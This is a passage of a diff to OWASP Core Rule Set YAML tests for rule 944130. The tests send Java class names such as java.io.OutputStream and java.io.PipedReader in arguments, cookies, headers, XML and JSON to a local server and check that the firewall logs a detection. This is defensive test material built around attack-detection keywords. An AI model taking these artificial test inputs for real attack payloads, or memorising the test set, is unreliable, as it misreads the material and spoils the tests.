"POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 190 desc: "Cookie test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.OutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 191 desc: "Cookie name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.OutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 192 desc: "Request header test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.OutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 193 desc: "XML attribute value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-194 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 194 desc: "XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 195 desc: "Nested XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-196 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 196 desc: "Content-Type text/plain includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 197 desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.OutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-198 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 198 desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.OutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.OutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 199 desc: "Argument test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 200 desc: "Argument name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 201 desc: "Cookie test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 202 desc: "Cookie name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 203 desc: "Request header test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 204 desc: "XML attribute value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-205 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 205 desc: "XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 206 desc: "Nested XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 207 desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 208 desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 209 desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 210 desc: "Argument test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_id: 211 desc: "Argument name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 212 desc: "Cookie test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 213 desc: "Cookie name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 214 desc: "Request header test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 215 desc: "XML attribute value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-216 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 216 desc: "XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_id: 217 desc: "Nested XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-218 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 